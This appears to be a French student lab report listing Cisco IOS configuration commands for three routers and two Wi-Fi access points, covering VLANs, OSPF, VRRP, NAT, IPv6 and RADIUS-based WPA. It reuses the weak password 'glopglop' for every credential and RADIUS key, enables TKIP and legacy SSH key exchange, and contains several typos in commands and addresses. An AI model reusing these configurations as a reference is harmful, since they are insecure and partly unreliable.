switch>enable
switch#configure terminal
  • Configuration du nom d’hôte :
switch(config)#hostname SE2A5-R1
  • Accès SSH :
SE2A5-R1(config)#aaa new-model
SE2A5-R1(config)#username admin privilege 15 secret glopglop
SE2A5-R1(config)#ip domain-name plil.info
SE2A5-R1(config)#crypto key generate rsa
SE2A5-R1(config)#line vty 0 15
SE2A5-R1(config-line)#transport input ssh
SE2A5-R1(config-line)#exit
  • Accès console :
SE2A5-R1(config)#line console 0
SE2A5-R1(config-line)#password glopglop
SE2A5-R1(config-line)#login authentification default
SE2A5-R1(config-line)#exit
  • Sécurisation des accès :
SE2A5-R1(config)#service password-encryption
SE2A5-R1(config)#enable secret glopglop
SE2A5-R1(config)#banner motd #Restricted Access#
  • Activer le routage :
SE2A5-R1(config)#ip routing
  • Activer VRRP :
SE2A5-R1(config)#license boot level network-advantage
SE2A5-R1(config)#fhrp version vrrp v3

  → Cisco Catalyst 9200

switch>enable
switch#configure terminal
  • Configuration du nom d’hôte :
switch(config)#hostname SE2A5-R2
  • Accès SSH :
SE2A5-R2(config)#aaa new-model
SE2A5-R2(config)#username admin privilege 15 secret glopglop
SE2A5-R2(config)#ip domain-name plil.info
SE2A5-R2(config)#crypto key generate rsa
SE2A5-R2(config)#line vty 0 15
SE2A5-R2(config-line)#transport input ssh
SE2A5-R2(config-line)#exit
  • Accès console :
SE2A5-R2(config)#line console 0
SE2A5-R2(config-line)#password glopglop
SE2A5-R2(config-line)#login authentification default
SE2A5-R2(config-line)#exit
  • Sécurisation des accès :
SE2A5-R2(config)#service password-encryption
SE2A5-R2(config)#enable secret glopglop
SE2A5-R2(config)#banner motd #Restricted Access#
  • Activer le routage :
SE2A5-R2(config)#ip routing
  • Activer VRRP :
SE2A5-R2(config)#license boot level network-advantage
SE2A5-R2(config)#fhrp version vrrp v3

Configuration du VLAN 110

Le VLAN 110 permet un accès à un réseau IPv4 routé.
Le réseau privé 10.60.0.0/16 est également utilisé sur ce réseau pour les points d’accès Wifi et les configurations IP des routeurs.

  → Cisco Catalyst 6509-E

  • VLAN 110 :
SE2A5-R1(config)#vlan 110
SE2A5-R1(config-vlan)#name TP-NET1
SE2A5-R1(config-vlan)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#description TP-NET1
SE2A5-R1(config-if)#ip address 10.60.100.1 255.255.255.0
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
  • Interface vers serveur Capbreton :
SE2A5-R1(config)#interface t6/4
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode access
SE2A5-R1(config-if)#switchport access vlan 110
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit

  → Cisco Catalyst 9200

  • VLAN 110 :
SE2A5-R2(config)#vlan 110
SE2A5-R2(config-vlan)#name TP-NET1
SE2A5-R2(config-vlan)#exit
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#description TP-NET1
SE2A5-R2(config-if)#ip address 10.60.100.2 255.255.255.0
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
  • Interface vers serveur Capbreton :
SE2A5-R2(config)#interface t1/1/1
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode access
SE2A5-R2(config-if)#switchport access vlan 110
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit

Configuration du VLAN 530

Le VLAN 530 permet l’interconnexion avec les routeurs de la plateforme maths/info.

  → Cisco Catalyst 6509-E

  • VLAN 530 :
SE2A5-R1(config)#vlan 530
SE2A5-R1(config-vlan)#name INTERCO-4A
SE2A5-R1(config-vlan)#exit
SE2A5-R1(config)#interface vlan 530
SE2A5-R1(config-if)#description INTERCO-4A
SE2A5-R1(config-if)#ip address 192.168.222.66 255.255.255.248
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
  • Interface d’interconnexion :
SE2A5-R1(config)#interface t6/5
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode access
SE2A5-R1(config-if)#switchport access vlan 530
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit

  → Cisco Catalyst 9200

  • VLAN 530 :
SE2A5-R2(config)#vlan 530
SE2A5-R2(config-vlan)#name INTERCO-4A
SE2A5-R2(config-vlan)#exit
SE2A5-R2(config)#interface vlan 530
SE2A5-R2(config-if)#description INTERCO-4A
SE2A5-R2(config-if)#ip address 192.168.222.67 255.255.255.248
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
  • Interface d’interconnexion :
SE2A5-R2(config)#interface g1/0/1
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode access
SE2A5-R2(config-if)#switchport access vlan 530
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit

Paramétrage du routage IPv4 OSPF

Le protocole de routage OSPF est utilisé sur le VLAN 530 afin de déterminer quel routeur aura le rôle de maître pour le routage des paquets et l’annonce des routes.

  → Cisco Catalyst 6509-E

  • Routage IPv4 - Protocole OPSF :
SE2A5-R1(config)#router ospf 1
SE2A5-R1(config-router)#router-id 192.168.222.66
SE2A5-R1(config-router)#summary-address 193.48.57.160 255.255.255.240
SE2A5-R1(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
SE2A5-R1(config-router)#redistribute connected subnets metric 1
SE2A5-R1(config-router)#redistribute static subnets metric 1
SE2A5-R1(config-router)#network 192.168.222.64 0.0.0.7 area 10
SE2A5-R1(config-router)#default-information originate
SE2A5-R1(config-router)#exit

  → Cisco Catalyst 9200

  • Routage IPv4 - Protocole OPSF :
SE2A5-R2(config)#router ospf 1
SE2A5-R2(config-router)#router-id 192.168.222.67
SE2A5-R2(config-router)#summary-address 193.48.57.160 255.255.255.240
SE2A5-R2(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
SE2A5-R2(config-router)#redistribute connected subnets metric 2
SE2A5-R2(config-router)#redistribute static subnets metric 2
SE2A5-R2(config-router)#network 192.168.222.64 0.0.0.7 area 10
SE2A5-R2(config-router)#default-information originate
SE2A5-R2(config-router)#exit

Le routeur Cisco Catalyst 9200 a une métrique plus élevée afin d’être le routeur secondaire sur le réseau.

Redondance des routeurs via le protocole VRRP

Le protocole de redondance VRRP est utilisé pour déterminer quel routeur doit avoir le rôle de maître sur le VLAN 110.
Le routeur Cisco Catalyst 6509-E a une métrique inférieure à celle du Cisco Catalyst 9200 afin qu’il soit le routeur maître sur le réseau.

  → Cisco Catalyst 6509-E

  • VLAN 110 :
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#vrrp 10 ip 10.60.100.254
SE2A5-R1(config-if)#vrrp 10 preempt
SE2A5-R1(config-if)#vrrp 10 priority 110
SE2A5-R1(config-if)#exit

  → Cisco Catalyst 9200

  • VLAN 110 :
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
SE2A5-R2(config-if-vrrp)#address 10.60.100.254
SE2A5-R2(config-if-vrrp)#vrrpv2
SE2A5-R2(config-if-vrrp)#priority 100
SE2A5-R2(config-if-vrrp)#preempt
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit

La version 3 du protocole VRRP n’est pas disponible sur le routeur Cisco Catalyst 6509-E.
Cependant, le routeur Cisco Catalyst 9200 utilise cette version par défaut.
La commande vrrpv2 est donc nécessaire afin d’utiliser la version 2 du protocole VRRP.

Translation NAT statique

  → Cisco Catalyst 6509-E

  • Configuration NAT :
SE2A5-R1(config)#interface vlan 530
SE2A5-R1(config-if)#ip nat outside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#ip nat inside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 /28
  • Redistribution via OSPF à partir de l’interface Loopback 0 :
SE2A5-R1(config)#interface loopback 0
SE2A5-R1(config-if)#ip address 193.48.57.174 255.255.255.240
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit

Les VM doivent avoir une configuration IP sur le réseau 193.48.57.160/28.
La communication fonctionne désormais sauf pour les paquets UDP qui sont filtrés.

On choisit de désactiver l’interface l0 pour économiser une adresse routée.
A la place, on passe par l’interface null0 :

SE2A5-R1(config)#interface loopback 0
SE2A5-R1(config-if)#shutdown
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#ip route 193.48.57.160 255.255.255.240 null0

Une solution de contournement serait d’utiliser des routes statiques comme pour le routeur Cisco Catalyst 9200 (voir ci-dessous).

  → Cisco Catalyst 9200

Comme le Cisco Catalyst 9200 ne prend pas en charge le protocole NAT, on utilise des routes statiques :

SE2A5-R2(config)#ip route 193.48.57.161 255.255.255.255 10.60.100.161
SE2A5-R2(config)#ip route 193.48.57.162 255.255.255.255 10.60.100.162
SE2A5-R2(config)#ip route 193.48.57.163 255.255.255.255 10.60.100.163
SE2A5-R2(config)#ip route 193.48.57.164 255.255.255.255 10.60.100.164
SE2A5-R2(config)#ip route 193.48.57.165 255.255.255.255 10.60.100.165
SE2A5-R2(config)#ip route 193.48.57.166 255.255.255.255 10.60.100.166
SE2A5-R2(config)#ip route 193.48.57.167 255.255.255.255 10.60.100.167
SE2A5-R2(config)#ip route 193.48.57.168 255.255.255.255 10.60.100.168
SE2A5-R2(config)#ip route 193.48.57.169 255.255.255.255 10.60.100.169
SE2A5-R2(config)#ip route 193.48.57.170 255.255.255.255 10.60.100.170
SE2A5-R2(config)#ip route 193.48.57.171 255.255.255.255 10.60.100.171
SE2A5-R2(config)#ip route 193.48.57.172 255.255.255.255 10.60.100.172
SE2A5-R2(config)#ip route 193.48.57.173 255.255.255.255 10.60.100.173

Cette solution est fonctionnelle mais impose que les VM aient une configuration IP sur le réseau 10.60.100.160/28.
Les VM devront donc avoir une configuration IP avec l’adresse locale et celle routée.

Configuration de l’accès Internet de secours

La liaison entre les routeurs déjà présents et le routeur Cisco ISR 4331 est configurée en mode trunk (802.1q).
On ajoute une règle SLA afin de tester la réponse du routeur de la plateforme maths/info situé en amont.
Si le routeur ne répond pas, on décrémente la métrique des routeurs sur le VLAN 110 afin que le routeur ISR 4331 devienne prioritaire.

  → Cisco Catalyst 6509-E

  • Interface vers Cisco ISR 4331 :
SE2A5-R1(config)#interface t5/5
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode trunk
SE2A5-R1(config-if)#switchport trunk allowed vlan 110
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
  • SLA :
SE2A5-R1(config)#ip sla 1
SE2A5-R1(config-ip-sla)#icmp-echo 192.168.222.65
SE2A5-R1(config-ip-sla-echo)#frequency 300
SE2A5-R1(config-ip-sla-echo)#exit
SE2A5-R1(config)#ip sla schedule 1 life forever start-time now
SE2A5-R1(config)#track 1 ip sla 1
SE2A5-R1(config-track)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#vrrp 10 track 1 decrement 50
SE2A5-R1(config-if)#exit

  → Cisco Catalyst 9200

  • Interface vers Cisco ISR 4331 :
SE2A5-R2(config)#interface g1/0/2
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode trunk
SE2A5-R2(config-if)#switchport trunk allowed vlan 110
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
  • SLA :
SE2A5-R2(config)#ip sla 1
SE2A5-R2(config-ip-sla)#icmp-echo 192.166.222.65
SE2A5-R2(config-ip-sla-echo)#frequency 300
SE2A5-R2(config-ip-sla-echo)#exit
SE2A5-R2(config)#ip sla schedule 1 life forever start-time now
SE2A5-R2(config)#track 1 ip sla 1
SE2A5-R2(config-track)#exit
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
SE2A5-R2(config-if-vrrp)#track 1 decrement 50
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit

  → Cisco ISR 4331

      Configuration de base :

switch>enable
switch#configure terminal
  • Configuration du nom d’hôte :
switch(config)#hostname SE2A5-R3
  • Accès SSH :
SE2A5-R3(config)#aaa new-model
SE2A5-R3(config)#username admin privilege 15 secret glopglop
SE2A5-R3(config)#ip domain-name plil.info
SE2A5-R3(config)#crypto key generate rsa
SE2A5-R3(config)#line vty 0 15
SE2A5-R3(config-line)#transport input ssh
SE2A5-R3(config-line)#exit
  • Accès console :
SE2A5-R3(config)#line console 0
SE2A5-R3(config-line)#password glopglop
SE2A5-R3(config-line)#login authentification default
SE2A5-R3(config-line)#exit
  • Sécurisation des accès :
SE2A5-R3(config)#service password-encryption
SE2A5-R3(config)#enable secret glopglop
SE2A5-R3(config)#banner motd #Restricted Access#
  • Activer le routage :
SE2A5-R3(config)#ip routing
  • Activer VRRP :
SE2A5-R3(config)#license boot level network-advantage
SE2A5-R3(config)#fhrp version vrrp v3

      Pont vers le VLAN 110 :

Le routeur Cisco ISR 4331 ne permet pas la configuration des VLAN. Une alternative à ce problème est de passer par des ponts (BDI) pour remplacer les VLAN 110 et 532.

  • Bridge VLAN 110 :
SE2A5-R3(config)#interface bdi 110
SE2A5-R3(config-if)#ip address 10.60.100.3 255.255.255.0
SE2A5-R3(config-if)#vrrp 10 ip 10.60.100.254
SE2A5-R3(config-if)#vrrp 10 preempt
SE2A5-R3(config-if)#vrrp 10 priority 90
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#exit
  • Interface vers Cisco Catalyst 6509-E :
SE2A5-R3(config)#interface g0/0/2
SE2A5-R3(config-if)#description TP-NET1
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#service instance 110 ethernet
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
SE2A5-R3(config-if-srv)#bridge-domain 110
SE2A5-R3(config-if-srv)#exit
SE2A5-R3(config-if)#exit
  • Interface vers Cisco Catalyst 9200 :
SE2A5-R3(config)#interface g0/0/1
SE2A5-R3(config-if)#description TP-NET1
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#service instance 110 ethernet
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
SE2A5-R3(config-if-srv)#bridge-domain 110
SE2A5-R3(config-if-srv)#exit
SE2A5-R3(config-if)#exit

      Pont vers le VLAN 532 :

Le VLAN 532 permet l’interconnexion avec l’accès Internet de secours.

  • Bridge VLAN 532 :
SE2A5-R3(config)#interface bdi 532
SE2A5-R3(config-if)#ip address 192.168.222.82 255.255.255.248
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#exit
  • Interface d’interconnexion :
SE2A5-R3(config)#interface g0/0/0
SE2A5-R3(config-if)#description INTERCO-1B
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#service instance 532 ethernet
SE2A5-R3(config-if-srv)#encapsulation untagged
SE2A5-R3(config-if-srv)#bridge-domain 532
SE2A5-R3(config-if-srv)#exit
SE2A5-R3(config-if)#exit

      Translation NAT dynamique :

On configure une mascarade sur l’accès Internet de secours. Pour cela, on utilise l’avant-dernière adresse du réseau routé 213.215.6.96/29 (soit l’adresse IP 213.215.6.101).

  • Configuration NAT :
SE2A5-R3(config)#interface loopback 0
SE2A5-R3(config-if)#ip address 213.215.6.101 255.255.255.255
SE2A5-R3(config-if)#exit
SE2A5-R3(config)#interface bdi 532
SE2A5-R3(config-if)#ip nat outside
SE2A5-R3(config-if)#exit
SE2A5-R3(config)#interface bdi 110
SE2A5-R3(config-if)#ip nat inside
SE2A5-R3(config-if)#exit
SE2A5-R3(config)#access-list 10 permit 193.48.57.160 0.0.0.15
SE2A5-R3(config)#ip nat inside source list 10 interface loopback 0 overload
SE2A5-R3(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 255.255.255.240

Paramétrage IPv6

Le protocole de routage utilisé pour IPv6 est RIPv6. Le routeur Cisco Catalyst 6509-E possède une métrique plus faible que le routeur Cisco Catalyst 9200 lui permettant de devenir prioritaire pour le routage IPv6.

  → Cisco Catalyst 6509-E

  • Routage IPv6 - Protocole RIPv6 :
SE2A5-R1(config)#ipv6 unicast-routing
SE2A5-R1(config)#ipv6 router rip tpima2a5
SE2A5-R1(config-router)#redistribute connected metric 1
SE2A5-R1(config-router)#redistribute rip 1 metric 1
SE2A5-R1(config-router)#redistribute static metric 1
SE2A5-R1(config-router)#exit
  • VLAN 110 :
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
SE2A5-R1(config-if)#ipv6 nd router-preference high
SE2A5-R1(config-if)#ipv6 enable
SE2A5-R1(config-if)#exit
  • VLAN 530 :
SE2A5-R1(config)#interface vlan 530
SE2A5-R1(config-if)#ipv6 address fe80::2 link-local
SE2A5-R1(config-if)#ipv6 rip tpima2a5 enable
SE2A5-R1(config-if)#ipv6 enable

  → Cisco Catalyst 9200

  • Routage IPv6 - Protocole RIPv6 :
SE2A5-R2(config)#ipv6 unicast-routing
SE2A5-R2(config)#ipv6 router rip tpima2a5
SE2A5-R2(config-router)#redistribute connected metric 2
SE2A5-R2(config-router)#redistribute rip 1 metric 2
SE2A5-R2(config-router)#redistribute static metric 2
SE2A5-R2(config-router)#exit
  • VLAN 110 :
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
SE2A5-R2(config-if)#ipv6 nd router-preference medium
SE2A5-R2(config-if)#ipv6 enable
SE2A5-R2(config-if)#exit
  • VLAN 530 :
SE2A5-R2(config)#interface vlan 530
SE2A5-R2(config-if)#ipv6 address fe80::3 link-local
SE2A5-R2(config-if)#ipv6 rip tpima2a5 enable
SE2A5-R2(config-if)#ipv6 enable
SE2A5-R2(config-if)#exit

  → Cisco ISR 4331

  • Activer le routage IPv6 :
SE2A5-R3(config)#ipv6 unicast-routing
  • Bridge VLAN 110 :
SE2A5-R3(config)#interface bdi 110
SE2A5-R3(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
SE2A5-R3(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
SE2A5-R3(config-if)#ipv6 nd router-preference low
SE2A5-R3(config-if)#ipv6 enable
SE2A5-R3(config-if)#exit
  • Bridge VLAN 532 :
SE2A5-R3(config)#interface bdi 532
SE2A5-R2(config-if)#ipv6 address fe80::2 link-local
SE2A5-R3(config-if)#ipv6 enable
SE2A5-R3(config-if)#exit

Configuration du VLAN 164

Le réseau privé (VLAN 164) est utilisé principalement pour les appareils connectés aux points d’accès Wifi. La plage IPv4 concernée par le VLAN 164 est 10.60.164.0/24.

  → Cisco Catalyst 6509-E

  • VLAN 164 :
SE2A5-R1(config)#vlan 164
SE2A5-R1(config-vlan)#name DEMINEUR
SE2A5-R1(config-vlan)#exit
SE2A5-R1(config)#interface vlan 164
SE2A5-R1(config-if)#description DEMINEUR
SE2A5-R1(config-if)#ip address 10.60.164.1 255.255.255.0
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
SE2A5-R1(config-if)#ipv6 nd router-preference high
SE2A5-R1(config-if)#ipv6 enable
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#vrrp 64 ip 10.60.164.254
SE2A5-R1(config-if)#vrrp 64 preempt
SE2A5-R1(config-if)#vrrp 64 priority 110
SE2A5-R1(config-if)#vrrp 64 track 1 decrement 50
SE2A5-R1(config-if)#exit
  • Interface vers Cisco Catalyst 9200 :
SE2A5-R1(config)#interface t5/4
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
SE2A5-R1(config-if)#exit
  • Interface vers le point d’accès Wifi :
SE2A5-R1(config)#interface g3/1
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
SE2A5-R1(config-if)#exit
  • DHCP :
SE2A5-R1(config)#ip dhcp pool DEMINEUR
SE2A5-R1(dhcp-config)#dns 193.48.57.164
SE2A5-R1(dhcp-config)#network 10.60.164.0 255.255.255.0
SE2A5-R1(dhcp-config)#default-router 10.60.164.254
SE2A5-R1(dhcp-config)#exit
SE2A5-R1(config)#ip dhcp excluded-address 10.60.164.0 10.60.164.99
SE2A5-R1(config)#ip dhcp excluded-address 10.60.164.150 10.60.164.255

  → Cisco Catalyst 9200

  • VLAN 164 :
SE2A5-R2(config)#vlan 164
SE2A5-R2(config-vlan)#name DEMINEUR
SE2A5-R2(config-vlan)#exit
SE2A5-R2(config)#interface vlan 164
SE2A5-R2(config-if)#description DEMINEUR
SE2A5-R2(config-if)#ip address 10.60.164.2 255.255.255.0
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
SE2A5-R2(config-if)#ipv6 nd router-preference medium
SE2A5-R2(config-if)#ipv6 enable
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#vrrp 64 address-family ipv4
SE2A5-R2(config-if-vrrp)#address 10.60.164.254
SE2A5-R2(config-if-vrrp)#priority 100
SE2A5-R2(config-if-vrrp)#preempt
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit
  • Interface vers Cisco Catalyst 6509-E :
SE2A5-R2(config)#interface t1/1/2
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
SE2A5-R2(config-if)#exit
  • Interface vers le point d’accès Wifi :
SE2A5-R2(config)#interface g1/0/3
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
SE2A5-R2(config-if)#exit
  • DHCP :
SE2A5-R2(config)#ip dhcp pool DEMINEUR
SE2A5-R2(dhcp-config)#dns 193.48.57.164
SE2A5-R2(dhcp-config)#network 10.60.164.0 255.255.255.0
SE2A5-R2(dhcp-config)#default-router 10.60.164.254
SE2A5-R2(dhcp-config)#exit
SE2A5-R2(config)#ip dhcp excluded-address 10.60.164.0 10.60.164.149
SE2A5-R2(config)#ip dhcp excluded-address 10.60.164.200 10.60.164.255

Configuration des points d’accès Wifi

  → Cisco Catalyst 6509-E

  • VLAN n°1 :
SE2A5-R1(config)#interface vlan 1
SE2A5-R1(config-if)#ip address 10.60.101.252 255.255.255.0
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#vrrp 1 ip 10.60.101.254
SE2A5-R1(config-if)#vrrp 1 preempt
SE2A5-R1(config-if)#vrrp 1 priority 110
SE2A5-R1(config-if)#exit
  • Interface vers le point d’accès Wifi :
SE2A5-R1(config)#interface g3/1
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode trunk
SE2A5-R1(config-if)#switchport trunk allowed vlan add 1
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
  • NAT PAT :
SE2A5-R1(config)#access-list 164 permit ip 10.60.164.0 0.0.0.255 any
SE2A5-R1(config)#interface vlan 164
SE2A5-R1(config-if)#ip nat inside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#ip nat outside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#ip nat inside source list 164 interface t6/4 overload

  → Cisco Catalyst 9200

  • VLAN n°1 :
SE2A5-R2(config)#interface vlan 1
SE2A5-R2(config-if)#ip address 10.60.101.253 255.255.255.0
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#vrrp 1 address-family ipv4
SE2A5-R2(config-if-vrrp)#address 10.60.101.254
SE2A5-R2(config-if-vrrp)#vrrpv2
SE2A5-R2(config-if-vrrp)#priority 100
SE2A5-R2(config-if-vrrp)#preempt
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit
  • Interface vers le point d’accès Wifi :
SE2A5-R2(config)#interface g1/0/3
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode trunk
SE2A5-R2(config-if)#switchport trunk allowed vlan 1
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit

  → Point d’accès Wifi n°1

      Configuration de base :

ap>enable
ap#configure terminal
  • Configuration du nom d’hôte :
ap(config)#hostname SE2A5-AP1
  • Accès SSH :
SE2A5-AP1(config)#aaa new-model
SE2A5-AP1(config)#username admin privilege 15 secret glopglop
SE2A5-AP1(config)#ip domain-name plil.info
SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048
SE2A5-AP1(config)#ip ssh version 2
SE2A5-AP1(config)#line vty 0 15
SE2A5-AP1(config-line)#transport input ssh
SE2A5-AP1(config-line)#exit
  • Accès console :
SE2A5-AP1(config)#line console 0
SE2A5-AP1(config-line)#password glopglop
SE2A5-AP1(config-line)#login authentification default
SE2A5-AP1(config-line)#exit
  • Sécurisation des accès :
SE2A5-AP1(config)#service password-encryption
SE2A5-AP1(config)#enable secret glopglop
SE2A5-AP1(config)#banner motd #Restricted Access#
  • VLAN n°1 :
SE2A5-AP1(config)#interface BVI 1
SE2A5-AP1(config-if)#ip address 10.60.101.1 255.255.255.0
SE2A5-AP1(config-if)#no shutdown
SE2A5-AP1(config-if)#exit
SE2A5-AP1(config)#ip default-gateway 10.60.101.254

      Réseau privé (VLAN 164) :

  • Configuration Wifi EAP :
SE2A5-AP1(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
SE2A5-AP1(config)#radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop
SE2A5-AP1(config)#aaa group server radius RADIUS_DEMINEUR
SE2A5-AP1(config-server)#server 10.60.100.164 auth-port 1812 acct-port 1813
SE2A5-AP1(config-server)#exit
SE2A5-AP1(config)#dot11 ssid DEMINEUR1
SE2A5-AP1(config-ssid)#mbssid guest-mode
SE2A5-AP1(config-ssid)#vlan 164
SE2A5-AP1(config-ssid)#authentication open eap EAP_DEMINEUR
SE2A5-AP1(config-ssid)#authentication network-eap EAP_DEMINEUR
SE2A5-AP1(config-ssid)#authentication key-management wpa
SE2A5-AP1(config-ssid)#exit
SE2A5-AP1(config)#interface dot11radio0.164
SE2A5-AP1(config-subif)#encapsulation dot1q 164
SE2A5-AP1(config-subif)#bridge-group 64
SE2A5-AP1(config-subif)#exit
SE2A5-AP1(config)#interface g0.164
SE2A5-AP1(config-subif)#encapsulation dot1q 164
SE2A5-AP1(config-subif)#bridge-group 64
SE2A5-AP1(config-subif)#exit
SE2A5-AP1(config)#interface dot11radio 0
SE2A5-AP2(config-if)#no shutdown
SE2A5-AP1(config-if)#encryption vlan 164 mode ciphers aes-ccm tkip
SE2A5-AP1(config-if)#mbssid
SE2A5-AP1(config-if)#ssid DEMINEUR1
SE2A5-AP1(config-if)#exit

On considère la commande ci-dessous de la configuration précédente :

radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop

Cette commande permet au PA de se connecter au serveur freeradius sur la VM afin de vérifier qu’un utilisateur se connecte avec les bons identifiants.
Le mot de passe glopglop qui est spécifié sera également à définir dans les clients freeradius sur la VM.

L’accès SSH au PA nécessite de spécifier l’utilisation de l’algorithme de Diffie-Hellman et le chiffrement AES-128 :

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc admin@10.60.101.1

  → Point d’accès Wifi n°2

      Configuration de base :

ap>enable
ap#configure terminal
  • Configuration du nom d’hôte :
ap(config)#hostname SE2A5-AP2
  • Accès SSH :
SE2A5-AP2(config)#aaa new-model
SE2A5-AP2(config)#username admin privilege 15 secret glopglop
SE2A5-AP2(config)#ip domain-name plil.info
SE2A5-AP2(config)#crypto key generate rsa general-keys modulus 2048
SE2A5-AP2(config)#ip ssh version 2
SE2A5-AP2(config)#line vty 0 15
SE2A5-AP2(config-line)#transport input ssh
SE2A5-AP2(config-line)#exit
  • Accès console :
SE2A5-AP2(config)#line console 0
SE2A5-AP2(config-line)#password glopglop
SE2A5-AP2(config-line)#login authentification default
SE2A5-AP2(config-line)#exit
  • Sécurisation des accès :
SE2A5-AP2(config)#service password-encryption
SE2A5-AP2(config)#enable secret glopglop
SE2A5-AP2(config)#banner motd #Restricted Access#
  • VLAN n°1 :
SE2A5-AP2(config)#interface BVI 1
SE2A5-AP2(config-if)#ip address 10.60.101.2 255.255.255.0
SE2A5-AP2(config-if)#no shutdown
SE2A5-AP2(config-if)#exit
SE2A5-AP2(config)#ip default-gateway 10.60.101.254

      Réseau privé (VLAN 164) :

  • Configuration Wifi EAP :
SE2A5-AP2(config)#aaa authentication login EAP_DEMINEUR group RADIUS_DEMINEUR
SE2A5-AP2(config)#radius-server host 10.60.100.164 auth-port 1812 acct-port 1813 key glopglop
SE2A5-AP2(config)#aaa group server radius RADIUS_DEMINEUR
SE2A5-AP2(config-server)#server 10.60.100.164 auth-port 1812 acct-port 1813
SE2A5-AP2(config-server)#exit
SE2A5-AP2(config)#dot11 ssid DEMINEUR2
SE2A5-AP2(config-ssid)#mbssid guest-mode
SE2A5-AP2(config-ssid)#vlan 164
SE2A5-AP2(config-ssid)#authentication open eap EAP_DEMINEUR
SE2A5-AP2(config-ssid)#authentication network-eap EAP_DEMINEUR
SE2A5-AP2(config-ssid)#authentication key-management wpa
SE2A5-AP2(config-ssid)#exit
SE2A5-AP2(config)#interface dot11radio0.164
SE2A5-AP2(config-subif)#encapsulation dot1q 164
SE2A5-AP2(config-subif)#bridge-group 64
SE2A5-AP2(config-subif)#exit
SE2A5-AP2(config)#interface g0.164
SE2A5-AP2(config-subif)#encapsulation dot1q 164
SE2A5-AP2(config-subif)#bridge-group 64
